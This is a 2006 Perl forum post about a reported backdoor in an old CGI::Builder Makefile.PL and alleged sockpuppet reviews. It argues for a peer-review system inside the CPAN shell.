Do you have a question? Post it now! No Registration Necessary. Now with pictures!
- Mumia W.
August 21, 2006, 7:13 am
rate this thread
While reading the reivews on CPAN, I noticed an informative
review of CGI::Builder. Evidently, back in 2004,
CGI::Builder's Makefile.PL, had backdoor code in it:
A recently-downloaded version of the module doesn't have this
code it, so evidently the author removed it after receiving
some criticism, but this points up a problem.
As well-respected as CPAN is, it seems to be perpetually "open
for business," and that means that anyone can put any thing
they want on there, and that means that some of the module
authors can get into your business.
Perhaps we need a peer-review system for CPAN. The reviews
site on CPAN may be that, but I hadn't seen it because I
usually look for modules in the CPAN shell.
What I would like is to be able to type this in the CPAN shell:
cpan> reviews CGI::Builder
And I would get a text page listing reviews of the module done
by trustworthy people.
Domizio Demichelis, the author of CGI::Builder, is also
reputed to have created a number of sockpuppets to tout his
module <http://cpanratings.perl.org/user/ovid , and so some
system would have to be in place to ensure that most of the
"peers" are not the module author.